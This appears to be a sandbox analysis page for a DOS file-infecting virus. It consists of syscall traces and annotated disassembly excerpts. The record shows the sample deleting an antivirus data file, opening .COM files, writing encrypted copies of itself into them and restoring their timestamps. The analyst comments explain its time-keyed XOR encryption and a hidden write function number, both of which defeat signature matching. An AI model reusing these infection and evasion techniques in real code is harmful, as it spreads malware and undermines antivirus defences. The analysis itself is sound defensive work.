; NOTE(review): presumably a later `pop ax` reads AH=40h (DOS write) from this slot,
; so no literal `mov ah, 0x40` appears in the code - confirm against the code
; after this excerpt. Pattern matching on that literal would not see these writes.
0x12c4b: push ax
0x12c4c: push bp
0x12c4d: mov bp, sp
0x12c4f: mov word ptr [bp + 2], 0x4001
0x12c54: pop bp
; XOR pass: CX = 0x18a (394) words, key in DX, source BP+0x11a, destination
; ES:[BP+0x505]. Assumes DF is clear; it is not set in this excerpt.
0x12c55: mov cx, 0x18a
0x12c58: mov dx, word ptr [bp + 0x42d]
0x12c5c: lea si, word ptr [bp + 0x11a]
0x12c60: lea di, word ptr [bp + 0x505]
; Per word: load, XOR with the 16-bit key, store. Because the key is a time word,
; the stored bytes differ between copies, so a byte signature over this region
; is not stable.
0x12c64: lodsw ax, word ptr [si]
0x12c65: xor ax, dx
0x12c67: stosw word ptr es:[di], ax
0x12c68: loop 0x12c64
; CX = 0x313 (787) and DX = the XORed buffer: these match the next trace entry,
; "Write 787 bytes on handle 5" at PC 12c7f.
0x12c6a: mov cx, 0x313
0x12c6d: lea dx, word ptr [bp + 0x505]
2018-12-25T11:42:59.870867421Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-25T11:42:59.88185027Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-25T11:42:59.891266522Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-25T11:42:59.894332703Z 66 PC: 12c9b | Move file pointer
2018-12-25T11:42:59.896679511Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:42:59.903966628Z 87 PC: 12cba | Get or set file date and time
2018-12-25T11:42:59.905754074Z 62 PC: 12cbe | Close file
2018-12-25T11:42:59.915835407Z 67 PC: 12ccd | Get or set file attributes
2018-12-25T11:42:59.92153602Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.924982917Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.9284209Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:42:59.940417989Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:42:59.948608427Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:42:59.957002316Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:42:59.958548865Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:42:59.961180159Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:42:59.965577057Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:42:59.969447181Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:42:59.979502227Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:42:59.983037081Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:42:59.98473163Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:42:59.993013159Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:42:59.995221441Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.005860809Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.011064385Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.014076563Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.025666622Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.033653199Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.04148242Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.044608619Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.047873638Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.050742778Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.055538901Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.064953186Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.069382113Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.07229745Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.079807438Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.081925975Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.091309871Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.0982132Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.101543989Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.112846639Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.121924306Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.129702831Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.131800009Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.136776354Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.140100848Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.143853529Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.154168817Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.158043136Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.160100036Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.167948924Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.171230453Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.180436283Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.186142558Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.190775569Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.202566492Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.210460703Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.218849504Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.221311261Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.22450112Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.228245957Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.232043395Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.241399054Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.244853206Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.247900405Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.255384703Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.257078026Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.266920878Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.273367013Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.276877927Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.28894556Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.298497378Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.306176061Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.309031419Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.312237705Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.315068421Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.32600607Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.336071821Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.339459955Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.341646324Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.349533281Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.351548619Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.360638503Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.366762599Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.3700354Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.38204684Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.390827073Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.398893034Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.401823344Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.406210619Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.409002943Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.412734563Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.422909503Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.426317871Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.428308123Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.436830404Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.438682443Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.447557324Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.454283696Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.457665445Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.469843043Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.478412398Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.482374288Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.484521183Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.493389944Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.500118801Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.502272182Z 59 PC: 12aa4 | Change current directory
2018-12-25T11:43:00.507331518Z 71 PC: 12ac7 | Get current directory
2018-12-25T11:43:00.517503284Z 59 PC: 12afa | Change current directory
2018-12-25T11:43:00.529484832Z 59 PC: 12b1b | Change current directory
; Disassembly excerpt attached to the DOS "Get time" call (syscall 44 = INT 21h AH=2Ch),
; which returns DH = seconds and DL = hundredths of a second. It is a time-gated
; display routine. The excerpt ends at the loop's back-jump; the jump targets
; 0x12b43 and 0x12b4c are outside it.
; Analyst note: behaviour gated on the clock is only observed when a run lands in
; the window. The run records on this page carry a TimeBased flag, which presumably
; means the sandbox varied the clock between runs - confirm against the sandbox docs.
2018-12-25T11:43:00.531906971Z 44 PC: 12b1f | Get time 0x12b1f: cmp dx, 5
; Unsigned DX > 5 skips the routine, so the code below is reached only when
; seconds == 0 and hundredths <= 5.
0x12b22: ja 0x12b4c
; NOTE(review): the nop runs after both conditional jumps look like assembler
; padding from a forward-jump size reservation; they do nothing.
0x12b24: nop
0x12b25: nop
0x12b26: nop
; INT 10h with AH=00h, AL=0Dh: set video mode 0Dh (320x200, 16 colours).
0x12b27: mov ax, 0xd
0x12b2a: int 0x10
; SI = address of a byte string at BP+0x3c2. BP is presumably the code's runtime
; base; its setup is not part of this excerpt.
0x12b2c: lea si, word ptr [bp + 0x3c2]
; Loop head: clear DF so lodsb walks forward, then fetch the next byte into AL.
0x12b30: cld
0x12b31: lodsb al, byte ptr [si]
; A zero byte ends the string and leaves the loop.
0x12b32: or al, al
0x12b34: je 0x12b43
0x12b36: nop
0x12b37: nop
0x12b38: nop
; INT 10h AH=0Eh: teletype output of AL on page 0 (BH=0) with colour 5 (BL).
0x12b39: mov ah, 0xe
0x12b3b: xor bh, bh
0x12b3d: mov bl, 5
0x12b3f: int 0x10
; Next character.
0x12b41: jmp 0x12b30
2018-12-25T11:43:00.535791912Z 26 PC: 12b5c | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":1188,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:42:59.422592895Z 26 PC: 12a7e | Set disk transfer address
2018-12-25T11:42:59.423912224Z 71 PC: 12a88 | Get current directory
2018-12-25T11:42:59.426910666Z 67 PC: 12cf2 | Get or set file attributes
2018-12-25T11:42:59.433464415Z 65 PC: 12cf6 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T11:42:59.445630954Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.452788857Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.459618751Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.465999921Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.47338764Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.4857388Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.497471495Z 78 PC: 12a90 | Find first file
2018-12-25T11:42:59.505289582Z 67 PC: 12bb0 | Get or set file attributes
2018-12-25T11:42:59.820062301Z 61 PC: 12bc5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:42:59.826374712Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:42:59.833204634Z 66 PC: 12c12 | Move file pointer
2018-12-25T11:42:59.834695659Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
; Disassembly excerpt attached to the DOS "Get time" call (syscall 44 = INT 21h AH=2Ch;
; DH = seconds, DL = hundredths). It saves the time word, issues one INT 21h call,
; then XORs part of the body into a scratch buffer. The excerpt stops before the
; INT 21h that consumes the final CX/DX.
; The first instruction stores DX at [BP+0x42d]; 0x12c58 reloads it as the XOR key,
; so the key changes with the time of the call.
2018-12-25T11:42:59.837030043Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
; CX = 0x15 (21) bytes, DX = buffer at BP+0x105. AX is popped from the stack, so the
; function number is not visible here; the trace logs this call as
; "Write 21 bytes on handle 5". These bytes are written as they sit in memory.
0x12c41: mov cx, 0x15
0x12c44: lea dx, word ptr [bp + 0x105]
0x12c48: pop ax
0x12c49: int 0x21
; The word pushed by `push ax` is overwritten in place with 0x4001 through a
; temporary BP frame ([bp+2] is that stack slot); `pop bp` restores BP.
; NOTE(review): presumably a later `pop ax` reads AH=40h (DOS write) from this slot,
; so no literal `mov ah, 0x40` appears in the code - confirm against the code
; after this excerpt. Pattern matching on that literal would not see these writes.
0x12c4b: push ax
0x12c4c: push bp
0x12c4d: mov bp, sp
0x12c4f: mov word ptr [bp + 2], 0x4001
0x12c54: pop bp
; XOR pass: CX = 0x18a (394) words, key in DX, source BP+0x11a, destination
; ES:[BP+0x505]. Assumes DF is clear; it is not set in this excerpt.
0x12c55: mov cx, 0x18a
0x12c58: mov dx, word ptr [bp + 0x42d]
0x12c5c: lea si, word ptr [bp + 0x11a]
0x12c60: lea di, word ptr [bp + 0x505]
; Per word: load, XOR with the 16-bit key, store. Because the key is a time word,
; the stored bytes differ between copies, so a byte signature over this region
; is not stable.
0x12c64: lodsw ax, word ptr [si]
0x12c65: xor ax, dx
0x12c67: stosw word ptr es:[di], ax
0x12c68: loop 0x12c64
; CX = 0x313 (787) and DX = the XORed buffer: these match the next trace entry,
; "Write 787 bytes on handle 5" at PC 12c7f.
0x12c6a: mov cx, 0x313
0x12c6d: lea dx, word ptr [bp + 0x505]
2018-12-25T11:42:59.839222443Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-25T11:42:59.842235834Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-25T11:42:59.850843153Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-25T11:42:59.853450324Z 66 PC: 12c9b | Move file pointer
2018-12-25T11:42:59.85862702Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:42:59.873310298Z 87 PC: 12cba | Get or set file date and time
2018-12-25T11:42:59.875911447Z 62 PC: 12cbe | Close file
2018-12-25T11:42:59.892276409Z 67 PC: 12ccd | Get or set file attributes
2018-12-25T11:42:59.896585232Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.89873794Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.903085641Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:42:59.910979246Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:42:59.916198785Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:42:59.922054918Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:42:59.923377942Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:42:59.925390922Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:42:59.927262628Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:42:59.930867276Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:42:59.93706166Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:42:59.94012597Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:42:59.943280465Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:42:59.947887652Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:42:59.9495988Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:42:59.955841666Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:42:59.962217501Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.965751517Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:42:59.979899344Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:42:59.987922329Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:42:59.995395272Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:42:59.997581669Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.000746189Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.00334474Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.007048642Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.016417772Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.019724509Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.021554522Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.029498128Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.031333048Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.040891015Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.047810737Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.05095083Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.062234138Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.070158988Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.077476556Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.078903852Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.082157439Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.085110321Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.088478582Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.098343643Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.10218713Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.103674976Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.111142867Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.113023961Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.121671485Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.127418228Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.131673742Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.142832921Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.150538878Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.159028667Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.16096568Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.163757841Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.167565939Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.170890113Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.179708047Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.183625889Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.185575454Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.192910606Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.195116911Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.20428639Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.209916903Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.213518088Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.22500323Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.233548099Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.241015878Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.243426874Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.246552271Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.249324416Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.259908727Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.269164819Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.272569985Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.27539088Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.28354879Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.285652595Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.295599923Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.301842141Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.304827204Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.316330644Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.324400346Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.331672247Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.334127513Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.340167709Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.342980311Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.346762687Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.357740489Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.361196435Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.363290977Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.372453064Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.374921618Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.384022865Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.391236265Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.394763151Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.405916231Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.414136096Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.422281619Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.424076146Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.435270025Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.441388857Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.444456536Z 59 PC: 12aa4 | Change current directory
2018-12-25T11:43:00.449459043Z 71 PC: 12ac7 | Get current directory
2018-12-25T11:43:00.454186015Z 59 PC: 12afa | Change current directory
2018-12-25T11:43:00.466338761Z 59 PC: 12b1b | Change current directory
; Disassembly excerpt attached to the DOS "Get time" call (syscall 44 = INT 21h AH=2Ch),
; which returns DH = seconds and DL = hundredths of a second. It is a time-gated
; display routine. The excerpt ends at the loop's back-jump; the jump targets
; 0x12b43 and 0x12b4c are outside it.
; Analyst note: behaviour gated on the clock is only observed when a run lands in
; the window. The run records on this page carry a TimeBased flag, which presumably
; means the sandbox varied the clock between runs - confirm against the sandbox docs.
2018-12-25T11:43:00.468739002Z 44 PC: 12b1f | Get time 0x12b1f: cmp dx, 5
; Unsigned DX > 5 skips the routine, so the code below is reached only when
; seconds == 0 and hundredths <= 5.
0x12b22: ja 0x12b4c
; NOTE(review): the nop runs after both conditional jumps look like assembler
; padding from a forward-jump size reservation; they do nothing.
0x12b24: nop
0x12b25: nop
0x12b26: nop
; INT 10h with AH=00h, AL=0Dh: set video mode 0Dh (320x200, 16 colours).
0x12b27: mov ax, 0xd
0x12b2a: int 0x10
; SI = address of a byte string at BP+0x3c2. BP is presumably the code's runtime
; base; its setup is not part of this excerpt.
0x12b2c: lea si, word ptr [bp + 0x3c2]
; Loop head: clear DF so lodsb walks forward, then fetch the next byte into AL.
0x12b30: cld
0x12b31: lodsb al, byte ptr [si]
; A zero byte ends the string and leaves the loop.
0x12b32: or al, al
0x12b34: je 0x12b43
0x12b36: nop
0x12b37: nop
0x12b38: nop
; INT 10h AH=0Eh: teletype output of AL on page 0 (BH=0) with colour 5 (BL).
0x12b39: mov ah, 0xe
0x12b3b: xor bh, bh
0x12b3d: mov bl, 5
0x12b3f: int 0x10
; Next character.
0x12b41: jmp 0x12b30
2018-12-25T11:43:00.472951536Z 26 PC: 12b5c | Set disk transfer address